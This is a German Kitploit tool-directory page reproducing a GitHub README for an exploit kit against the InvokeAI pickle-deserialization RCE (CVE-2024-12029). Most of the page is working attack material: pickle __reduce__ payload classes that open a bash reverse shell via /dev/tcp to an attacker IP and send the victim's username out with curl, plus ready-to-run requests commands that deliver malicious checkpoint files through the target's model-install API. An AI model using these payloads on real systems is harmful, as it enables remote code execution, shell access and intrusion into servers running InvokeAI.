Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Alternative-Approach-Reverse-Shell-Callback-Test-InvokeAI-RCE — This repository contains alternative payload approaches for the InvokeAI RCE vulnerability (CVE-2024-12029) when SSH key injection fails. The payloads are designed to test if pickle deserialization is actually occurring and provide alternative access methods. | Kitploit
Tools/GitHubGitHub/lu3ky13/alternative-approach-reverse-shell-callback-test-invokeai-rce
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlLearning & EducationRemote Access ToolPayload Development

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
GitHub
lu3ky13/alternative-approach-reverse-shell-callback-test-invokeai-rce

Alternative-Approach-Reverse-Shell-Callback-Test-InvokeAI-RCE

This repository contains alternative payload approaches for the InvokeAI RCE vulnerability (CVE-2024-12029) when SSH key injection fails. The payloads are designed to test if pickle deserialization is actually occurring and provide alternative access methods.

Repository anzeigen
vor 4 MonatenNoch nicht geprüft

Alternative-Approach-Reverse-Shell-Callback-Test-InvokeAI-RCE

Alternativer Ansatz: Reverse Shell & Callback-Test

Übersicht

Dieses Repository enthält alternative Payload-Ansätze für die InvokeAI-RCE-Schwachstelle (CVE-2024-12029), wenn die SSH-Schlüsselinjektion fehlschlägt. Die Payloads wurden entwickelt, um zu testen, ob eine Pickle-Deserialisierung tatsächlich stattfindet, und bieten alternative Zugriffsmethoden.

Problemstellung

Wenn SSH-Schlüsselinjektions-Payloads erfolgreich zugestellt werden (Status 201), der SSH-Zugriff jedoch weiterhin ein Passwort erfordert, deutet dies auf Folgendes hin:

  1. Pickle-Deserialisierung findet nicht statt
  2. Befehle werden blockiert/in einer Sandbox ausgeführt
  3. Die Ausführungsmethode ist inkompatibel

Lösung: Alternative Payloads

📁 Payload-Dateien

Reverse-Shell-Payloads

  • payload_reverse_bash.ckpt (89 Bytes) - Bash-Reverse-Shell
  • payload_reverse_python.ckpt (267 Bytes) - Python-Reverse-Shell
  • payload_reverse_nc.ckpt (70 Bytes) - Netcat-Reverse-Shell

Test- und Verifikations-Payloads

  • payload_callback_test.ckpt (115 Bytes) - HTTP-Callback zur Verifizierung der Deserialisierung
  • payload_test.ckpt (90 Bytes) - Einfacher Dateierstellungstest
  • payload_alt_exec.ckpt (223 Bytes) - Alternative Ausführungsmethode

SSH-Payloads (als Referenz)

  • payload_ssh_simple.ckpt (271 Bytes) - Linux-kompatible SSH-Schlüsselinjektion

🛠️ Testskripte

Kali-Testskripte

  • kali_reverse_test.py - Umfassende Testsuite

Payload-Generatoren

  • reverse_shell_payload.py - Reverse-Shell-Payloads erzeugen

🚀 Schnelle Verwendung

1. Payload-Server starten

root@kitploit:~
python web_server.py --port 8000

2. Callback testen (zuerst empfohlen)

root@kitploit:~
# Copy kali_reverse_test.py to Kali and run:
python3 kali_reverse_test.py
# Choose option 1 to test callback

3. Reverse-Shell testen

root@kitploit:~
# Start listener on Kali:
nc -lvnp 4444

# Send reverse shell payload:
python3 -c "import requests; requests.post('http://192.168.117.218:9090/api/v2/models/install', params={'source': 'http://192.168.45.168:8000/payload_reverse_bash.ckpt', 'inplace': 'true'}, json={})"

4. Einfache Ausführung testen

root@kitploit:~
# Test basic command execution:
python3 -c "import requests; requests.post('http://192.168.117.218:9090/api/v2/models/install', params={'source': 'http://192.168.45.168:8000/payload_test.ckpt', 'inplace': 'true'}, json={})"

# Verify file creation:
ssh [email protected] 'cat /tmp/payload_test.txt'

📊 Interpretation der Testergebnisse

✅ Callback-Test erfolgreich

  • Bedeutung: Die Pickle-Deserialisierung funktioniert
  • Nächster Schritt: Reverse-Shell- oder alternative SSH-Payloads ausprobieren
  • Prüfen: Webserver-Logs auf HTTP-Callback

✅ Reverse-Shell erfolgreich

  • Bedeutung: Befehle werden ausgeführt und der Netzwerkzugriff funktioniert
  • Ergebnis: Direkter Shell-Zugriff über den Netcat-Listener
  • Nächster Schritt: Reverse-Shell für die weitere Ausnutzung verwenden

✅ Testdatei erstellt

  • Bedeutung: Die grundlegende Befehlsausführung funktioniert
  • Nächster Schritt: Alternative SSH-Injektionsmethoden ausprobieren
  • Prüfen: /tmp/payload_test.txt auf dem Zielsystem

Callback-Payload

root@kitploit:~
class CallbackTestPayload:
    def __reduce__(self):
        import os
        command = 'curl "http://192.168.45.168:8000/callback?success=1&user=$(whoami)"'
        return (os.system, (command,))

Reverse-Shell-Payload

root@kitploit:~
class ReverseShellPayload:
    def __reduce__(self):
        import os
        command = f'bash -c "bash -i >& /dev/tcp/192.168.45.168/4444 0>&1"'
        return (os.system, (command,))

Test-Payload

root@kitploit:~
class TestPayload:
    def __reduce__(self):
        import os
        return (os.system, ('echo "PAYLOAD_EXECUTED_$(date)" > /tmp/payload_test.txt',))

📚 Referenzen

  • CVE-2024-12029: InvokeAI Remote Code Execution
  • PyTorch Unsafe Deserialization: torch.load()-Schwachstelle
  • Pickle reduce: Ausnutzung der Python-Objekt-Serialisierung

⚠️ Haftungsausschluss

Dieses Repository dient ausschließlich Bildungs- und autorisierten Sicherheitstestzwecken. Die Nutzer sind dafür verantwortlich, sicherzustellen, dass sie über die entsprechende Autorisierung verfügen, bevor sie Systeme testen.

Tool herunterladen